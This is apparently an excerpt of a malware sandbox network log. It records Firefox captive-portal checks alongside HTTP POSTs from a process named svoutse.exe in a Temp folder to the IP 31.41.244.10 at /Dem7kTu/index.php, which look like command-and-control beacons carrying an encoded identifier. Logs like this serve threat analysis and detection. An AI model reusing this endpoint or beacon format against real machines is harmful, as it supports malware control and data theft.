Sep 6, 2024 09:59:17.098833084 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:59:17.198914051 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81994 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:59:17.508625031 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81994 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:59:17.621206045 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:59:17.715951920 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81994 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:59:27.771945000 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 09:59:37.602473974 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:59:37.696945906 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 82014 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:59:47.765019894 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 09:59:57.777081966 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:07.877926111 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:17.975328922 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:18.109494925 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 10:00:18.203846931 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 82055 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 10:00:28.270910025 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:29.277605057 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:39.581146955 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:49.671474934 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:59.676774025 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:01:21.446661949 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 10:01:21.541481972 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 82118 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 10:01:21.908921003 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 10:01:22.004229069 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 82118 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 10:01:41.161015987 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 10:01:41.257282972 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 82138 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49846	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:54.635510921 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:55.334207058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:55.335114002 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:55.566302061 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49849	34.107.221.82	80	5932	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:54.946131945 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:55.394378901 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84810 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:56.260695934 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:56.355680943 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84811 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:56.952691078 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:57.047287941 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84812 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:57.170998096 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:57.265746117 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84812 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:58.062472105 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:58.157038927 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84813 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:58.602226973 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:58.697249889 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84813 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:59.024858952 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:59.129280090 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84814 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:59.140733004 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:59.241357088 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84814 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:59.435245991 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:59.530286074 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84814 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:59:00.116244078 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:59:00.210728884 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84815 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:59:00.641000986 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:59:00.735862017 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84815 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:59:01.111459970 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:59:01.224765062 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84816 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:59:07.566299915 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:59:07.705518961 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84822 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:59:17.201961994 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:59:17.508059978 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84832 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:59:17.559309959 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84832 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:59:17.719358921 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:59:17.814310074 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84832 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:59:27.876221895 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 09:59:37.700900078 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:59:37.795656919 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84852 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:59:47.865720034 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 09:59:57.974425077 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:08.079339981 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:18.173741102 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:18.209569931 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 10:00:18.304064035 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84893 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 10:00:28.371134043 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:29.477649927 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:39.581145048 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:49.671473026 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:00:59.676774025 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 10:01:21.546698093 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 10:01:21.641510010 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84956 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 10:01:22.008637905 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 10:01:22.103374004 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84957 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 10:01:41.264303923 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 10:01:41.359023094 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84976 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49851	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:55.724023104 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:56.398051977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
